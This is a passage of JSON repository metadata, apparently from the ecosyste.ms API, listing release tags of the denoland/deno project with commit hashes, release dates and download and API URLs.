eleases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitH